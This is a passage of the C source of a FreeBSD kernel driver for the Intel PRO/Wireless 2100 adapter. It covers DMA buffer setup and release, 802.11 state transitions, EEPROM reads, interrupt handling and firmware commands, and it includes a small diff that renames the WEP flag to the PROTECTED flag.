Allocate headers DMA maps. */ error = bus_dma_tag_create(sc->parent_dmat, 1, 0, BUS_SPACE_MAXADDR_32BIT, BUS_SPACE_MAXADDR, NULL, NULL, sizeof (struct ipw_hdr), 1, sizeof (struct ipw_hdr), 0, NULL, NULL, &sc->hdr_dmat); if (error != 0) { device_printf(sc->sc_dev, "could not create header DMA tag\n"); goto fail; } SLIST_INIT(&sc->free_shdr); for (i = 0; i < IPW_NDATA; i++) { shdr = &sc->shdr_list[i]; error = bus_dmamap_create(sc->hdr_dmat, 0, &shdr->map); if (error != 0) { device_printf(sc->sc_dev, "could not create header DMA map\n"); goto fail; } SLIST_INSERT_HEAD(&sc->free_shdr, shdr, next); } /* * Allocate tx buffers DMA maps. */ error = bus_dma_tag_create(sc->parent_dmat, 1, 0, BUS_SPACE_MAXADDR_32BIT, BUS_SPACE_MAXADDR, NULL, NULL, MCLBYTES, IPW_MAX_NSEG, MCLBYTES, 0, NULL, NULL, &sc->txbuf_dmat); if (error != 0) { device_printf(sc->sc_dev, "could not create tx DMA tag\n"); goto fail; } SLIST_INIT(&sc->free_sbuf); for (i = 0; i < IPW_NDATA; i++) { sbuf = &sc->tx_sbuf_list[i]; error = bus_dmamap_create(sc->txbuf_dmat, 0, &sbuf->map); if (error != 0) { device_printf(sc->sc_dev, "could not create tx DMA map\n"); goto fail; } SLIST_INSERT_HEAD(&sc->free_sbuf, sbuf, next); } /* * Initialize tx ring. */ for (i = 0; i < IPW_NTBD; i++) { sbd = &sc->stbd_list[i]; sbd->bd = &sc->tbd_list[i]; sbd->type = IPW_SBD_TYPE_NOASSOC; } /* * Pre-allocate rx buffers and DMA maps. 
*/ error = bus_dma_tag_create(sc->parent_dmat, 1, 0, BUS_SPACE_MAXADDR_32BIT, BUS_SPACE_MAXADDR, NULL, NULL, MCLBYTES, 1, MCLBYTES, 0, NULL, NULL, &sc->rxbuf_dmat); if (error != 0) { device_printf(sc->sc_dev, "could not create rx DMA tag\n"); goto fail; } for (i = 0; i < IPW_NRBD; i++) { sbd = &sc->srbd_list[i]; sbuf = &sc->rx_sbuf_list[i]; sbd->bd = &sc->rbd_list[i]; sbuf->m = m_getcl(M_NOWAIT, MT_DATA, M_PKTHDR); if (sbuf->m == NULL) { device_printf(sc->sc_dev, "could not allocate rx mbuf\n"); error = ENOMEM; goto fail; } error = bus_dmamap_create(sc->rxbuf_dmat, 0, &sbuf->map); if (error != 0) { device_printf(sc->sc_dev, "could not create rx DMA map\n"); goto fail; } error = bus_dmamap_load(sc->rxbuf_dmat, sbuf->map, mtod(sbuf->m, void *), MCLBYTES, ipw_dma_map_addr, &physaddr, 0); if (error != 0) { device_printf(sc->sc_dev, "could not map rx DMA memory\n"); goto fail; } sbd->type = IPW_SBD_TYPE_DATA; sbd->priv = sbuf; sbd->bd->physaddr = htole32(physaddr); sbd->bd->len = htole32(MCLBYTES); } bus_dmamap_sync(sc->rbd_dmat, sc->rbd_map, BUS_DMASYNC_PREWRITE); return 0; fail: ipw_release(sc); return error; } static void ipw_release(struct ipw_softc *sc) { struct ipw_soft_buf *sbuf; int i; if (sc->parent_dmat != NULL) { bus_dma_tag_destroy(sc->parent_dmat); } if (sc->tbd_dmat != NULL) { if (sc->stbd_list != NULL) { bus_dmamap_unload(sc->tbd_dmat, sc->tbd_map); bus_dmamem_free(sc->tbd_dmat, sc->tbd_list, sc->tbd_map); } bus_dma_tag_destroy(sc->tbd_dmat); } if (sc->rbd_dmat != NULL) { if (sc->rbd_list != NULL) { bus_dmamap_unload(sc->rbd_dmat, sc->rbd_map); bus_dmamem_free(sc->rbd_dmat, sc->rbd_list, sc->rbd_map); } bus_dma_tag_destroy(sc->rbd_dmat); } if (sc->status_dmat != NULL) { if (sc->status_list != NULL) { bus_dmamap_unload(sc->status_dmat, sc->status_map); bus_dmamem_free(sc->status_dmat, sc->status_list, sc->status_map); } bus_dma_tag_destroy(sc->status_dmat); } for (i = 0; i < IPW_NTBD; i++) ipw_release_sbd(sc, &sc->stbd_list[i]); if (sc->cmd_dmat != NULL) { bus_dmamap_destroy(sc->cmd_dmat, sc->cmd_map); bus_dma_tag_destroy(sc->cmd_dmat); } if (sc->hdr_dmat != NULL) { for (i = 0; i < IPW_NDATA; i++) bus_dmamap_destroy(sc->hdr_dmat, sc->shdr_list[i].map); bus_dma_tag_destroy(sc->hdr_dmat); } if (sc->txbuf_dmat != NULL) { for (i = 0; i < IPW_NDATA; i++) { bus_dmamap_destroy(sc->txbuf_dmat, sc->tx_sbuf_list[i].map); } bus_dma_tag_destroy(sc->txbuf_dmat); } if (sc->rxbuf_dmat != NULL) { for (i = 0; i < IPW_NRBD; i++) { sbuf = &sc->rx_sbuf_list[i]; if (sbuf->m != NULL) { bus_dmamap_sync(sc->rxbuf_dmat, sbuf->map, BUS_DMASYNC_POSTREAD); bus_dmamap_unload(sc->rxbuf_dmat, sbuf->map); m_freem(sbuf->m); } bus_dmamap_destroy(sc->rxbuf_dmat, sbuf->map); } bus_dma_tag_destroy(sc->rxbuf_dmat); } } static int ipw_shutdown(device_t dev) { struct ipw_softc *sc = device_get_softc(dev); ipw_stop(sc); return 0; } static int ipw_suspend(device_t dev) { struct ipw_softc *sc = device_get_softc(dev); struct ieee80211com *ic = sc->sc_ifp->if_l2com; ieee80211_suspend_all(ic); return 0; } static int ipw_resume(device_t dev) { struct ipw_softc *sc = device_get_softc(dev); struct ieee80211com *ic = sc->sc_ifp->if_l2com; pci_write_config(dev, 0x41, 0, 1); ieee80211_resume_all(ic); return 0; } static int ipw_cvtrate(int ipwrate) { switch (ipwrate) { case IPW_RATE_DS1: return 2; case IPW_RATE_DS2: return 4; case IPW_RATE_DS5: return 11; case IPW_RATE_DS11: return 22; } return 0; } /* * The firmware automatically adapts the transmit speed. We report its current * value here. 
 */
static void
ipw_media_status(struct ifnet *ifp, struct ifmediareq *imr)
{
	struct ieee80211vap *vap = ifp->if_softc;
	struct ieee80211com *ic = vap->iv_ic;
	struct ipw_softc *sc = ic->ic_ifp->if_softc;

	/* read current transmission rate from adapter */
	vap->iv_bss->ni_txrate = ipw_cvtrate(
	    ipw_read_table1(sc, IPW_INFO_CURRENT_TX_RATE) & 0xf);
	ieee80211_media_status(ifp, imr);
}

static int
ipw_newstate(struct ieee80211vap *vap, enum ieee80211_state nstate, int arg)
{
	struct ipw_vap *ivp = IPW_VAP(vap);
	struct ieee80211com *ic = vap->iv_ic;
	struct ifnet *ifp = ic->ic_ifp;
	struct ipw_softc *sc = ifp->if_softc;
	enum ieee80211_state ostate;

	DPRINTF(("%s: %s -> %s flags 0x%x\n", __func__,
	    ieee80211_state_name[vap->iv_state],
	    ieee80211_state_name[nstate], sc->flags));

	ostate = vap->iv_state;
	IEEE80211_UNLOCK(ic);

	switch (nstate) {
	case IEEE80211_S_RUN:
		if (ic->ic_opmode == IEEE80211_M_IBSS) {
			/*
			 * XXX when joining an ibss network we are called
			 * with a SCAN -> RUN transition on scan complete.
			 * Use that to call ipw_assoc.  On completing the
			 * join we are then called again with an AUTH -> RUN
			 * transition and we want to do nothing.  This is
			 * all totally bogus and needs to be redone.
			 */
			if (ostate == IEEE80211_S_SCAN)
				ipw_assoc(ic, vap);
		}
		break;

	case IEEE80211_S_INIT:
		if (sc->flags & IPW_FLAG_ASSOCIATED)
			ipw_disassoc(ic, vap);
		break;

	case IEEE80211_S_AUTH:
		/*
		 * Move to ASSOC state after the ipw_assoc() call.  Firmware
		 * takes care of authentication; after the call we'll receive
		 * only an assoc response, which would otherwise be discarded
		 * if we are still in AUTH state.
		 */
		nstate = IEEE80211_S_ASSOC;
		ipw_assoc(ic, vap);
		break;

	case IEEE80211_S_ASSOC:
		/*
		 * If we are not transitioning from AUTH then resend the
		 * association request.
		 */
		if (ostate != IEEE80211_S_AUTH)
			ipw_assoc(ic, vap);
		break;

	default:
		break;
	}
	IEEE80211_LOCK(ic);
	return ivp->newstate(vap, nstate, arg);
}

/*
 * Read 16 bits at address 'addr' from the serial EEPROM.
 */
*/ static uint16_t ipw_read_prom_word(struct ipw_softc *sc, uint8_t addr) { uint32_t tmp; uint16_t val; int n; /* clock C once before the first command */ IPW_EEPROM_CTL(sc, 0); IPW_EEPROM_CTL(sc, IPW_EEPROM_S); IPW_EEPROM_CTL(sc, IPW_EEPROM_S | IPW_EEPROM_C); IPW_EEPROM_CTL(sc, IPW_EEPROM_S); /* write start bit (1) */ IPW_EEPROM_CTL(sc, IPW_EEPROM_S | IPW_EEPROM_D); IPW_EEPROM_CTL(sc, IPW_EEPROM_S | IPW_EEPROM_D | IPW_EEPROM_C); /* write READ opcode (10) */ IPW_EEPROM_CTL(sc, IPW_EEPROM_S | IPW_EEPROM_D); IPW_EEPROM_CTL(sc, IPW_EEPROM_S | IPW_EEPROM_D | IPW_EEPROM_C); IPW_EEPROM_CTL(sc, IPW_EEPROM_S); IPW_EEPROM_CTL(sc, IPW_EEPROM_S | IPW_EEPROM_C); /* write address A7-A0 */ for (n = 7; n >= 0; n--) { IPW_EEPROM_CTL(sc, IPW_EEPROM_S | (((addr >> n) & 1) << IPW_EEPROM_SHIFT_D)); IPW_EEPROM_CTL(sc, IPW_EEPROM_S | (((addr >> n) & 1) << IPW_EEPROM_SHIFT_D) | IPW_EEPROM_C); } IPW_EEPROM_CTL(sc, IPW_EEPROM_S); /* read data Q15-Q0 */ val = 0; for (n = 15; n >= 0; n--) { IPW_EEPROM_CTL(sc, IPW_EEPROM_S | IPW_EEPROM_C); IPW_EEPROM_CTL(sc, IPW_EEPROM_S); tmp = MEM_READ_4(sc, IPW_MEM_EEPROM_CTL); val |= ((tmp & IPW_EEPROM_Q) >> IPW_EEPROM_SHIFT_Q) << n; } IPW_EEPROM_CTL(sc, 0); /* clear Chip Select and clock C */ IPW_EEPROM_CTL(sc, IPW_EEPROM_S); IPW_EEPROM_CTL(sc, 0); IPW_EEPROM_CTL(sc, IPW_EEPROM_C); return le16toh(val); } static void ipw_rx_cmd_intr(struct ipw_softc *sc, struct ipw_soft_buf *sbuf) { struct ipw_cmd *cmd; bus_dmamap_sync(sc->rxbuf_dmat, sbuf->map, BUS_DMASYNC_POSTREAD); cmd = mtod(sbuf->m, struct ipw_cmd *); DPRINTFN(9, ("cmd ack'ed %s(%u, %u, %u, %u, %u)\n", ipw_cmdname(le32toh(cmd->type)), le32toh(cmd->type), le32toh(cmd->subtype), le32toh(cmd->seq), le32toh(cmd->len), le32toh(cmd->status))); sc->flags &= ~IPW_FLAG_BUSY; wakeup(sc); } static void ipw_rx_newstate_intr(struct ipw_softc *sc, struct ipw_soft_buf *sbuf) { #define IEEESTATE(vap) ieee80211_state_name[vap->iv_state] struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); uint32_t state; bus_dmamap_sync(sc->rxbuf_dmat, sbuf->map, BUS_DMASYNC_POSTREAD); state = le32toh(*mtod(sbuf->m, uint32_t *)); switch (state) { case IPW_STATE_ASSOCIATED: DPRINTFN(2, ("Association succeeded (%s flags 0x%x)\n", IEEESTATE(vap), sc->flags)); /* XXX suppress state change in case the fw auto-associates */ if ((sc->flags & IPW_FLAG_ASSOCIATING) == 0) { DPRINTF(("Unexpected association (%s, flags 0x%x)\n", IEEESTATE(vap), sc->flags)); break; } sc->flags &= ~IPW_FLAG_ASSOCIATING; sc->flags |= IPW_FLAG_ASSOCIATED; break; case IPW_STATE_SCANNING: DPRINTFN(3, ("Scanning (%s flags 0x%x)\n", IEEESTATE(vap), sc->flags)); /* * NB: Check driver state for association on assoc * loss as the firmware will immediately start to * scan and we would treat it as a beacon miss if * we checked the 802.11 layer state. */ if (sc->flags & IPW_FLAG_ASSOCIATED) { IPW_UNLOCK(sc); /* XXX probably need to issue disassoc to fw */ ieee80211_beacon_miss(ic); IPW_LOCK(sc); } break; case IPW_STATE_SCAN_COMPLETE: /* * XXX For some reason scan requests generate scan * started + scan done events before any traffic is * received (e.g. probe response frames). We work * around this by marking the HACK flag and skipping * the first scan complete event. 
*/ DPRINTFN(3, ("Scan complete (%s flags 0x%x)\n", IEEESTATE(vap), sc->flags)); if (sc->flags & IPW_FLAG_HACK) { sc->flags &= ~IPW_FLAG_HACK; break; } if (sc->flags & IPW_FLAG_SCANNING) { IPW_UNLOCK(sc); ieee80211_scan_done(vap); IPW_LOCK(sc); sc->flags &= ~IPW_FLAG_SCANNING; sc->sc_scan_timer = 0; } break; case IPW_STATE_ASSOCIATION_LOST: DPRINTFN(2, ("Association lost (%s flags 0x%x)\n", IEEESTATE(vap), sc->flags)); sc->flags &= ~(IPW_FLAG_ASSOCIATING | IPW_FLAG_ASSOCIATED); if (vap->iv_state == IEEE80211_S_RUN) { IPW_UNLOCK(sc); ieee80211_new_state(vap, IEEE80211_S_SCAN, -1); IPW_LOCK(sc); } break; case IPW_STATE_DISABLED: /* XXX? is this right? */ sc->flags &= ~(IPW_FLAG_HACK | IPW_FLAG_SCANNING | IPW_FLAG_ASSOCIATING | IPW_FLAG_ASSOCIATED); DPRINTFN(2, ("Firmware disabled (%s flags 0x%x)\n", IEEESTATE(vap), sc->flags)); break; case IPW_STATE_RADIO_DISABLED: device_printf(sc->sc_dev, "radio turned off\n"); ieee80211_notify_radio(ic, 0); ipw_stop_locked(sc); /* XXX start polling thread to detect radio on */ break; default: DPRINTFN(2, ("%s: unhandled state %u %s flags 0x%x\n", __func__, state, IEEESTATE(vap), sc->flags)); break; } #undef IEEESTATE } /* * Set driver state for current channel. */ static void ipw_setcurchan(struct ipw_softc *sc, struct ieee80211_channel *chan) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; ic->ic_curchan = chan; ieee80211_radiotap_chan_change(ic); } /* * XXX: Hack to set the current channel to the value advertised in beacons or * probe responses. Only used during AP detection. */ static void ipw_fix_channel(struct ipw_softc *sc, struct mbuf *m) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211_channel *c; struct ieee80211_frame *wh; uint8_t subtype; uint8_t *frm, *efrm; wh = mtod(m, struct ieee80211_frame *); if ((wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK) != IEEE80211_FC0_TYPE_MGT) return; subtype = wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK; if (subtype != IEEE80211_FC0_SUBTYPE_BEACON && subtype != IEEE80211_FC0_SUBTYPE_PROBE_RESP) return; /* XXX use ieee80211_parse_beacon */ frm = (uint8_t *)(wh + 1); efrm = mtod(m, uint8_t *) + m->m_len; frm += 12; /* skip tstamp, bintval and capinfo fields */ while (frm < efrm) { if (*frm == IEEE80211_ELEMID_DSPARMS) #if IEEE80211_CHAN_MAX < 255 if (frm[2] <= IEEE80211_CHAN_MAX) #endif { DPRINTF(("Fixing channel to %d\n", frm[2])); c = ieee80211_find_channel(ic, ieee80211_ieee2mhz(frm[2], 0), IEEE80211_CHAN_B); if (c == NULL) c = &ic->ic_channels[0]; ipw_setcurchan(sc, c); } frm += frm[1] + 2; } } static void ipw_rx_data_intr(struct ipw_softc *sc, struct ipw_status *status, struct ipw_soft_bd *sbd, struct ipw_soft_buf *sbuf) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct mbuf *mnew, *m; struct ieee80211_node *ni; bus_addr_t physaddr; int error; int8_t rssi, nf; DPRINTFN(5, ("received frame len=%u, rssi=%u\n", le32toh(status->len), status->rssi)); if (le32toh(status->len) < sizeof (struct ieee80211_frame_min) || le32toh(status->len) > MCLBYTES) return; /* * Try to allocate a new mbuf for this ring element and load it before * processing the current mbuf. If the ring element cannot be loaded, * drop the received packet and reuse the old mbuf. In the unlikely * case that the old mbuf can't be reloaded either, explicitly panic. 
*/ mnew = m_getcl(M_NOWAIT, MT_DATA, M_PKTHDR); if (mnew == NULL) { ifp->if_ierrors++; return; } bus_dmamap_sync(sc->rxbuf_dmat, sbuf->map, BUS_DMASYNC_POSTREAD); bus_dmamap_unload(sc->rxbuf_dmat, sbuf->map); error = bus_dmamap_load(sc->rxbuf_dmat, sbuf->map, mtod(mnew, void *), MCLBYTES, ipw_dma_map_addr, &physaddr, 0); if (error != 0) { m_freem(mnew); /* try to reload the old mbuf */ error = bus_dmamap_load(sc->rxbuf_dmat, sbuf->map, mtod(sbuf->m, void *), MCLBYTES, ipw_dma_map_addr, &physaddr, 0); if (error != 0) { /* very unlikely that it will fail... */ panic("%s: could not load old rx mbuf", device_get_name(sc->sc_dev)); } ifp->if_ierrors++; return; } /* * New mbuf successfully loaded, update Rx ring and continue * processing. */ m = sbuf->m; sbuf->m = mnew; sbd->bd->physaddr = htole32(physaddr); /* finalize mbuf */ m->m_pkthdr.rcvif = ifp; m->m_pkthdr.len = m->m_len = le32toh(status->len); rssi = status->rssi + IPW_RSSI_TO_DBM; nf = -95; if (ieee80211_radiotap_active(ic)) { struct ipw_rx_radiotap_header *tap = &sc->sc_rxtap; tap->wr_flags = 0; tap->wr_antsignal = rssi; tap->wr_antnoise = nf; } if (sc->flags & IPW_FLAG_SCANNING) ipw_fix_channel(sc, m); IPW_UNLOCK(sc); ni = ieee80211_find_rxnode(ic, mtod(m, struct ieee80211_frame_min *)); if (ni != NULL) { (void) ieee80211_input(ni, m, rssi - nf, nf); ieee80211_free_node(ni); } else (void) ieee80211_input_all(ic, m, rssi - nf, nf); IPW_LOCK(sc); bus_dmamap_sync(sc->rbd_dmat, sc->rbd_map, BUS_DMASYNC_PREWRITE); } static void ipw_rx_intr(struct ipw_softc *sc) { struct ipw_status *status; struct ipw_soft_bd *sbd; struct ipw_soft_buf *sbuf; uint32_t r, i; if (!(sc->flags & IPW_FLAG_FW_INITED)) return; r = CSR_READ_4(sc, IPW_CSR_RX_READ); bus_dmamap_sync(sc->status_dmat, sc->status_map, BUS_DMASYNC_POSTREAD); for (i = (sc->rxcur + 1) % IPW_NRBD; i != r; i = (i + 1) % IPW_NRBD) { status = &sc->status_list[i]; sbd = &sc->srbd_list[i]; sbuf = sbd->priv; switch (le16toh(status->code) & 0xf) { case IPW_STATUS_CODE_COMMAND: ipw_rx_cmd_intr(sc, sbuf); break; case IPW_STATUS_CODE_NEWSTATE: ipw_rx_newstate_intr(sc, sbuf); break; case IPW_STATUS_CODE_DATA_802_3: case IPW_STATUS_CODE_DATA_802_11: ipw_rx_data_intr(sc, status, sbd, sbuf); break; case IPW_STATUS_CODE_NOTIFICATION: DPRINTFN(2, ("notification status, len %u flags 0x%x\n", le32toh(status->len), status->flags)); /* XXX maybe drive state machine AUTH->ASSOC? */ break; default: device_printf(sc->sc_dev, "unexpected status code %u\n", le16toh(status->code)); } /* firmware was killed, stop processing received frames */ if (!(sc->flags & IPW_FLAG_FW_INITED)) return; sbd->bd->flags = 0; } bus_dmamap_sync(sc->rbd_dmat, sc->rbd_map, BUS_DMASYNC_PREWRITE); /* kick the firmware */ sc->rxcur = (r == 0) ? 
IPW_NRBD - 1 : r - 1; CSR_WRITE_4(sc, IPW_CSR_RX_WRITE, sc->rxcur); } static void ipw_release_sbd(struct ipw_softc *sc, struct ipw_soft_bd *sbd) { struct ipw_soft_hdr *shdr; struct ipw_soft_buf *sbuf; switch (sbd->type) { case IPW_SBD_TYPE_COMMAND: bus_dmamap_sync(sc->cmd_dmat, sc->cmd_map, BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(sc->cmd_dmat, sc->cmd_map); break; case IPW_SBD_TYPE_HEADER: shdr = sbd->priv; bus_dmamap_sync(sc->hdr_dmat, shdr->map, BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(sc->hdr_dmat, shdr->map); SLIST_INSERT_HEAD(&sc->free_shdr, shdr, next); break; case IPW_SBD_TYPE_DATA: sbuf = sbd->priv; bus_dmamap_sync(sc->txbuf_dmat, sbuf->map, BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(sc->txbuf_dmat, sbuf->map); SLIST_INSERT_HEAD(&sc->free_sbuf, sbuf, next); if (sbuf->m->m_flags & M_TXCB) ieee80211_process_callback(sbuf->ni, sbuf->m, 0/*XXX*/); m_freem(sbuf->m); ieee80211_free_node(sbuf->ni); sc->sc_tx_timer = 0; break; } sbd->type = IPW_SBD_TYPE_NOASSOC; } static void ipw_tx_intr(struct ipw_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ipw_soft_bd *sbd; uint32_t r, i; if (!(sc->flags & IPW_FLAG_FW_INITED)) return; r = CSR_READ_4(sc, IPW_CSR_TX_READ); for (i = (sc->txold + 1) % IPW_NTBD; i != r; i = (i + 1) % IPW_NTBD) { sbd = &sc->stbd_list[i]; if (sbd->type == IPW_SBD_TYPE_DATA) ifp->if_opackets++; ipw_release_sbd(sc, sbd); sc->txfree++; } /* remember what the firmware has processed */ sc->txold = (r == 0) ? IPW_NTBD - 1 : r - 1; ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; ipw_start_locked(ifp); } static void ipw_fatal_error_intr(struct ipw_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); device_printf(sc->sc_dev, "firmware error\n"); if (vap != NULL) { IPW_UNLOCK(sc); ieee80211_cancel_scan(vap); IPW_LOCK(sc); } ieee80211_runtask(ic, &sc->sc_init_task); } static void ipw_intr(void *arg) { struct ipw_softc *sc = arg; uint32_t r; IPW_LOCK(sc); r = CSR_READ_4(sc, IPW_CSR_INTR); if (r == 0 || r == 0xffffffff) goto done; /* disable interrupts */ CSR_WRITE_4(sc, IPW_CSR_INTR_MASK, 0); /* acknowledge all interrupts */ CSR_WRITE_4(sc, IPW_CSR_INTR, r); if (r & (IPW_INTR_FATAL_ERROR | IPW_INTR_PARITY_ERROR)) { ipw_fatal_error_intr(sc); goto done; } if (r & IPW_INTR_FW_INIT_DONE) wakeup(sc); if (r & IPW_INTR_RX_TRANSFER) ipw_rx_intr(sc); if (r & IPW_INTR_TX_TRANSFER) ipw_tx_intr(sc); /* re-enable interrupts */ CSR_WRITE_4(sc, IPW_CSR_INTR_MASK, IPW_INTR_MASK); done: IPW_UNLOCK(sc); } static void ipw_dma_map_addr(void *arg, bus_dma_segment_t *segs, int nseg, int error) { if (error != 0) return; KASSERT(nseg == 1, ("too many DMA segments, %d should be 1", nseg)); *(bus_addr_t *)arg = segs[0].ds_addr; } static const char * ipw_cmdname(int cmd) { #define N(a) (sizeof(a) / sizeof(a[0])) static const struct { int cmd; const char *name; } cmds[] = { { IPW_CMD_ADD_MULTICAST, "ADD_MULTICAST" }, { IPW_CMD_BROADCAST_SCAN, "BROADCAST_SCAN" }, { IPW_CMD_DISABLE, "DISABLE" }, { IPW_CMD_DISABLE_PHY, "DISABLE_PHY" }, { IPW_CMD_ENABLE, "ENABLE" }, { IPW_CMD_PREPARE_POWER_DOWN, "PREPARE_POWER_DOWN" }, { IPW_CMD_SET_BASIC_TX_RATES, "SET_BASIC_TX_RATES" }, { IPW_CMD_SET_BEACON_INTERVAL, "SET_BEACON_INTERVAL" }, { IPW_CMD_SET_CHANNEL, "SET_CHANNEL" }, { IPW_CMD_SET_CONFIGURATION, "SET_CONFIGURATION" }, { IPW_CMD_SET_DESIRED_BSSID, "SET_DESIRED_BSSID" }, { IPW_CMD_SET_ESSID, "SET_ESSID" }, { IPW_CMD_SET_FRAG_THRESHOLD, "SET_FRAG_THRESHOLD" }, { IPW_CMD_SET_MAC_ADDRESS, "SET_MAC_ADDRESS" }, { IPW_CMD_SET_MANDATORY_BSSID, 
"SET_MANDATORY_BSSID" }, { IPW_CMD_SET_MODE, "SET_MODE" }, { IPW_CMD_SET_MSDU_TX_RATES, "SET_MSDU_TX_RATES" }, { IPW_CMD_SET_POWER_MODE, "SET_POWER_MODE" }, { IPW_CMD_SET_RTS_THRESHOLD, "SET_RTS_THRESHOLD" }, { IPW_CMD_SET_SCAN_OPTIONS, "SET_SCAN_OPTIONS" }, { IPW_CMD_SET_SECURITY_INFO, "SET_SECURITY_INFO" }, { IPW_CMD_SET_TX_POWER_INDEX, "SET_TX_POWER_INDEX" }, { IPW_CMD_SET_TX_RATES, "SET_TX_RATES" }, { IPW_CMD_SET_WEP_FLAGS, "SET_WEP_FLAGS" }, { IPW_CMD_SET_WEP_KEY, "SET_WEP_KEY" }, { IPW_CMD_SET_WEP_KEY_INDEX, "SET_WEP_KEY_INDEX" }, { IPW_CMD_SET_WPA_IE, "SET_WPA_IE" }, }; static char buf[12]; int i; for (i = 0; i < N(cmds); i++) if (cmds[i].cmd == cmd) return cmds[i].name; snprintf(buf, sizeof(buf), "%u", cmd); return buf; #undef N } /* * Send a command to the firmware and wait for the acknowledgement. */ static int ipw_cmd(struct ipw_softc *sc, uint32_t type, void *data, uint32_t len) { struct ipw_soft_bd *sbd; bus_addr_t physaddr; int error; IPW_LOCK_ASSERT(sc); if (sc->flags & IPW_FLAG_BUSY) { device_printf(sc->sc_dev, "%s: %s not sent, busy\n", __func__, ipw_cmdname(type)); return EAGAIN; } sc->flags |= IPW_FLAG_BUSY; sbd = &sc->stbd_list[sc->txcur]; error = bus_dmamap_load(sc->cmd_dmat, sc->cmd_map, &sc->cmd, sizeof (struct ipw_cmd), ipw_dma_map_addr, &physaddr, 0); if (error != 0) { device_printf(sc->sc_dev, "could not map command DMA memory\n"); sc->flags &= ~IPW_FLAG_BUSY; return error; } sc->cmd.type = htole32(type); sc->cmd.subtype = 0; sc->cmd.len = htole32(len); sc->cmd.seq = 0; memcpy(sc->cmd.data, data, len); sbd->type = IPW_SBD_TYPE_COMMAND; sbd->bd->physaddr = htole32(physaddr); sbd->bd->len = htole32(sizeof (struct ipw_cmd)); sbd->bd->nfrag = 1; sbd->bd->flags = IPW_BD_FLAG_TX_FRAME_COMMAND | IPW_BD_FLAG_TX_LAST_FRAGMENT; bus_dmamap_sync(sc->cmd_dmat, sc->cmd_map, BUS_DMASYNC_PREWRITE); bus_dmamap_sync(sc->tbd_dmat, sc->tbd_map, BUS_DMASYNC_PREWRITE); #ifdef IPW_DEBUG if (ipw_debug >= 4) { printf("sending %s(%u, %u, %u, %u)", ipw_cmdname(type), type, 0, 0, len); /* Print the data buffer in the higher debug level */ if (ipw_debug >= 9 && len > 0) { printf(" data: 0x"); for (int i = 1; i <= len; i++) printf("%1D", (u_char *)data + len - i, ""); } printf("\n"); } #endif /* kick firmware */ sc->txfree--; sc->txcur = (sc->txcur + 1) % IPW_NTBD; CSR_WRITE_4(sc, IPW_CSR_TX_WRITE, sc->txcur); /* wait at most one second for command to complete */ error = msleep(sc, &sc->sc_mtx, 0, "ipwcmd", hz); if (error != 0) { device_printf(sc->sc_dev, "%s: %s failed, timeout (error %u)\n", __func__, ipw_cmdname(type), error); sc->flags &= ~IPW_FLAG_BUSY; return (error); } return (0); } static int ipw_tx_start(struct ifnet *ifp, struct mbuf *m0, struct ieee80211_node *ni) { struct ipw_softc *sc = ifp->if_softc; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = ni->ni_vap; struct ieee80211_frame *wh; struct ipw_soft_bd *sbd; struct ipw_soft_hdr *shdr; struct ipw_soft_buf *sbuf; struct ieee80211_key *k; struct mbuf *mnew; bus_dma_segment_t segs[IPW_MAX_NSEG]; bus_addr_t physaddr; int nsegs, error, i; wh = mtod(m0, struct ieee80211_frame *); - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { k = ieee80211_crypto_encap(ni, m0); if (k == NULL) { m_freem(m0); return ENOBUFS; } /* packet header may have moved, reset our local pointer */ wh = mtod(m0, struct ieee80211_frame *); } if (ieee80211_radiotap_active_vap(vap)) { struct ipw_tx_radiotap_header *tap = &sc->sc_txtap; tap->wt_flags = 0; ieee80211_radiotap_tx(vap, m0); } shdr = 
SLIST_FIRST(&sc->free_shdr); sbuf = SLIST_FIRST(&sc->free_sbuf); KASSERT(shdr != NULL && sbuf != NULL, ("empty sw hdr/buf pool")); shdr->hdr.type = htole32(IPW_HDR_TYPE_SEND); shdr->hdr.subtype = 0; - shdr->hdr.encrypted = (wh->i_fc[1] & IEEE80211_FC1_WEP) ? 1 : 0; + shdr->hdr.encrypted = (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) ? 1 : 0; shdr->hdr.encrypt = 0; shdr->hdr.keyidx = 0; shdr->hdr.keysz = 0; shdr->hdr.fragmentsz = 0; IEEE80211_ADDR_COPY(shdr->hdr.src_addr, wh->i_addr2); if (ic->ic_opmode == IEEE80211_M_STA) IEEE80211_ADDR_COPY(shdr->hdr.dst_addr, wh->i_addr3); else IEEE80211_ADDR_COPY(shdr->hdr.dst_addr, wh->i_addr1); /* trim IEEE802.11 header */ m_adj(m0, sizeof (struct ieee80211_frame)); error = bus_dmamap_load_mbuf_sg(sc->txbuf_dmat, sbuf->map, m0, segs, &nsegs, 0); if (error != 0 && error != EFBIG) { device_printf(sc->sc_dev, "could not map mbuf (error %d)\n", error); m_freem(m0); return error; } if (error != 0) { mnew = m_defrag(m0, M_NOWAIT); if (mnew == NULL) { device_printf(sc->sc_dev, "could not defragment mbuf\n"); m_freem(m0); return ENOBUFS; } m0 = mnew; error = bus_dmamap_load_mbuf_sg(sc->txbuf_dmat, sbuf->map, m0, segs, &nsegs, 0); if (error != 0) { device_printf(sc->sc_dev, "could not map mbuf (error %d)\n", error); m_freem(m0); return error; } } error = bus_dmamap_load(sc->hdr_dmat, shdr->map, &shdr->hdr, sizeof (struct ipw_hdr), ipw_dma_map_addr, &physaddr, 0); if (error != 0) { device_printf(sc->sc_dev, "could not map header DMA memory\n"); bus_dmamap_unload(sc->txbuf_dmat, sbuf->map); m_freem(m0); return error; } 